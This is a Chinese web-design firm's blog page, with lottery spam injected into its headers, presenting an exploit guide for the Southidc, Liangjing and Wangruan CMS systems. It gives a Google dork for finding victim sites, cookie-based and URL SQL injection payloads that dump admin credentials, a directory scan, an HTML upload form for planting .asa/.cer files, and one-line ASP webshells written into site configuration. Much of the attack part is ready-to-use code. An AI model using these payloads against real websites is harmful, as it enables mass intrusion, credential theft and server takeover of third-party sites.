青海網站建設、網絡推廣最好的公司--您身邊的網站建設專家,馬上拿起電話,聯系我們:0971-8235355   
黑龙江11选5预测网 黑龙江11选5预测网 |  公司簡介 |  網站建設 |  網絡推廣 |  空間租用 |  域名注冊 |  企業郵局 |  網絡安全 |  網站編程 |  客服中心 |  聯系我們 |  人才招聘
 
西寧威勢最新網站制做案例展示
Lastest Project
 
西寧網站建設  
當前位置為:黑龙江11选5预测网 >> 腳本安全 >> 正文  
[原創]南方企業網站管理系統網站后臺密碼讀取工具

文章來源: 黑龙江11选5预测网     發布時間:2008-12-6    瀏覽次數:22301    tags:南方企業 網站管理系統 密碼 注入 漏洞

    Jessica以前給我發過一套系統,說是有漏洞讓我研究一下,結果就這樣認識了這套系統,據JESSICA介紹才知道,這套系統的名字叫做南方企業網站管理系統,用的人還挺多的,好多企業的網站都是用這套系統來搭建的,包括青海本地好多公司的網站,可是這套系統有著很嚴重的漏洞,好多人對它視而不見,該漏洞可以引起網站被黑或是后臺資料被刪除等后果,今天閑著無聊,自己隨手寫了一個該網站程序的漏洞測試工具,使用很簡單,只需要打開你的網站(前提是使用前面所述的網站管理系統),找一篇文章打開,然后把瀏覽器中的地址寫到工具的提交表單中,點擊提交就可以,如果你的后臺的密碼和用戶名被成功的讀取出來的話,那么就證明你的網站有漏洞,要修補了??!

以下是引用片段:
//www.ymbxx.icu/MyCode/hacker/CookiesHack.asp

     小提示,在GOOGLE中搜索“inurl:"/ProductShow.asp?ArticleID="”會出來N多網站,基本上都是上面的系統做的,幾乎95%都可以拿到密碼。

之二:

    對于另一版本的程序(具體版本號不詳),用上面的方法是取不到密碼的,可是漏洞依然存在,用以下代碼在瀏覽器中提交,然后刷新,即可看到密碼。

第一步,瀏覽某一文章,如:

//www.ymbxx.icu/shownews.asp?id=65

第二步,清空瀏覽器地址欄,輸入以下代碼,回車。

javascript:alert(document.cookie="id="+escape("65 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))

第三部,在地址欄輸入//www.ymbxx.icu/shownews.asp 并刷新,即可看到密碼。

一點小技巧,往往我們暴出來的密碼,MD5的時候要麻收費,要麻查不出來,這時候我們可以試試網站有沒有其它管理員存在,或許存在著弱口令呢,OK,改一下上面的注入語句,把當前默認管理員的ID暴出來

javascript:alert(document.cookie="id="+escape("91 and 1=2 union select 1,username,password,4,5,6,7,id,9,10 from Admin"))

提交并刷新頁面后頁面返回

admin
發布時間:10

d9ba59abbe56e0c7

 

注意看發布時間的后面10代表當前用戶的ID,OK,有了這個ID,我們改變語句,再暴其它管理員的帳戶,接著來

javascript:alert(document.cookie="id="+escape("91 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin where id>10"))

提交,然后重新刷新頁面,OK,又暴出來了一個管理員帳戶,并且是弱口令,拿到CMD5上面一查,密碼123456,成功登錄后臺。

Found:  /admin/southidceditor/popup.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/UpFile.asp?gl=file  (HTTP/1.1 500 Internal Server Error)  !!
Found:  /admin/southidceditor/popup.asp   (HTTP/1.1 200 OK)  !!!
Found:  /admin/SouthidcEditor/ewebeditor.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/picture.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/upfile.asp  (HTTP/1.1 200 OK)  !!!
Found:  /inc/  (HTTP/1.1 403 Forbidden)  !!!
Found:  /admin/ewebeditor/  (HTTP/1.1 403 Forbidden)  !!!
Found:  /inc/conn.asp  (HTTP/1.1 200 OK)  !!!
Found:  /UploadFiles/  (HTTP/1.1 403 Forbidden)  !!!
Found:  /xml/  (HTTP/1.1 403 Forbidden)  !!!
Found:  /scripts/  (HTTP/1.1 403 Forbidden)  !!!
Found:  /admin/admin.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/SiteConfig.asp  (HTTP/1.1 200 OK)  !!!
Found:  /inc/conn.asp  (HTTP/1.1 200 OK)  !!!
Found:  /  (HTTP/1.1 200 OK)  !!!
Found:  /foot.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/conn.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/UpFile.asp?fp1=D:  (HTTP/1.1 200 OK)  !!!
Found:  /admin/eWebEditor/admin_login.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/ewebeditor/ewebeditor.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/SouthidcEditor/Dialog/help/main.htm  (HTTP/1.1 200 OK)  !!!
Found:  /admin/SouthidcEditor/Upload.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/login.asp  (HTTP/1.1 200 OK)  !!!

/Southidceditor/admin_style.asp?action=copy&id=14
/SouthidcEditor/Admin_Style.asp?action=styleset&id=47
/Southidceditor/ewebeditor.asp?id=57&style=southidc
/Southidceditor/Datas/SouthidcEditor.mdb
/Southidceditor/login.asp

以上內容原創,以下內容為轉載

南方數據編輯器(southidceditor)我也來暴個注入0day漏洞及搞webshell方法
2010-06-22 17:09

1.注入點:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7

也可能是(另外一個版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7

直接暴管理員帳號密碼(md5)

2.登陸后臺

3.利用編輯器上傳:

訪問admin/southidceditor/admin_style.asp

修改編輯器樣式,增加asa(不要asp).然后直接后臺編輯新聞上傳.

========================================

參考資料整理:

黑龙江11选5现场:南方數據、良精系統、網軟天下漏洞利用

www.hx99.net     時間: 2009-12-18     閱讀: 28次      整理: 華西安全網

黑龙江11选5预测网 www.ymbxx.icu 1、通過upfile_other.asp漏洞文件直接取SHELL

直接打開userreg.asp進行注冊會員,進行登錄,(在未退出登錄的狀態下)使用本地上傳文件進行上傳代碼如下:

<HTML><HEAD>  
<META http-equiv=Content-Type content="text/html; charset=gb2312">  
<STYLE type=text/css>BODY {  
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee  
}  
.tx1 {  
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px  
}  
</STYLE>

<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>  
<BODY leftMargin=0 topMargin=0>  
<FORM name=form1 action="//www.huobaodidai.cn/upfile_Other.asp"; method=post  
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上傳 name=Submit>  
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>

將以上代碼保存為html格式,替換代碼中的網址,第一個框里選擇圖片文件,第二個框選擇.cer、.asa或asp文件上傳(后面需要加一個空格,貌似在IE8中進行使用不能后面加空格,加空格時就彈出選擇文件對話框,我是找不到解決辦法)。

注:此方法通殺南方數據、良精系統、網軟天下等

2、通過注入秒殺管理員帳號密碼,使用如下:

//www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’

以上代碼直接暴管理員帳號和密碼,取SHELL方法如下:

在網站配置[//www.target.com/admin/SiteConfig.asp]的版權信息里寫入 "%><%eval(request(chr(35)))%><%’

成功把shell寫入//www.target.com/inc/config.asp

這里一句話chr(32)密碼是“#”

3、cookie注入

清空地址欄,利用union語句來注入,提交:

javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))

如果你牛你就手工,反正我是不會,用刺猬大哥的“cookie注入轉換工具”方便又迅速何樂而不為?

注:貌似南方數據、良精系統、網軟天下等系統也都存在COOKIE注入。

(當然南方不只有上面三個漏洞,還有幾個漏洞貌似不常用,反正我給我常用的總結出來希望對大家有幫助)

三、后臺取SHELL方法總結

(1)在系統管理中的網站配置中插入一句話馬:進入后臺后,點左邊的”系統管理”再點擊”網站配置”在右邊的”網站名稱”(也可以在其它處)后加入"%><%Eval(Request(chr(112)))%><%’,再點保存配置,如圖:

然后我們打開inc/config.asp文件,看到一句話馬已寫入到配置文件中了,

這時再打開一句話馬的客戶端,提交同樣得到一個小馬

(注:以下均在其它網站上測試所截的圖,為防止信息泄漏,未截留網站連接,請諒解!)

(2)后臺上傳漏洞,在Upfile_Photo.asp文件中部分代碼片段如下:

if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
                    EnableUpload=false
               end if
               if EnableUpload=false then
                      msg="這種文件類型不允許上傳!nn只允許上傳這幾種文件類型:" & UpFileType
                      FoundErr=true
               end if

大家可以看到程序只限制了對"asp","asa","aspx"類的文件上傳,我們只要在”網站配置”的允許的上傳文件類型處增加上傳“cer“等被服務器可解析的文件類型就可,如圖:


提交時卻顯示下載頁面 ,上傳其它如”htr,cdx”等后綴文件時,提交時服務器卻不請求(只能說運氣不好吧)

(3)后臺備份,直接在”產品管理”下的添加產品中上傳jpg后綴的asp馬,再到”系統管理”下的數據庫備份,在”當前數據庫路徑”欄填入上傳的路徑,在” 備份數據庫名稱”填入你要備份馬的名稱,不過系統會在名稱后自動添加上.asa的

點”確定”后提示”備份數據庫成功….”不過實際文件是沒有.asa的

直接訪問備份后的地址,就得到一個webshell


(以上雖用網軟做的后臺演示,但南方和良精后臺取shell都是大同小異的)


上一篇:[原創]對一個常見經典的上傳程序漏洞的修補過程
下一篇:本人N年前寫的文章,注入影子鷹
評論列表
正在加載評論……
  
評論   
呢  稱:
驗證碼: 若看不清請點擊更換!
內  容:
 
 
  在線洽談咨詢:
點擊這里,在線洽談   點擊這里,在線洽談   點擊這里,在線洽談
與我交談  與我交談 與我交談
乘車路線    匯款方式   加盟合作  人才招聘  
公司地址:青海省西寧市西關大街73號(三二四部隊招行所四樓)     青ICP備13000578號-1 公安機關備案號:63010402000123    
QQ:147399120    mail:[email protected]    電話: 13897410341    郵編:810000
© Copyright( 2008-2009) www.ymbxx.icu All Rights Reserved    版權所有:西寧威勢電子信息服務有限公司 未經書面制授權,請勿隨意轉載!
業務:青海網站制做、青海網站建設、青海網頁設計、西寧網站制做、西寧網站建設、青海域名注冊、青海網絡推廣、青海網站推廣、青??占渥庥?/a>、黑龙江11选5预测网、黑龙江11选5预测网、網絡安全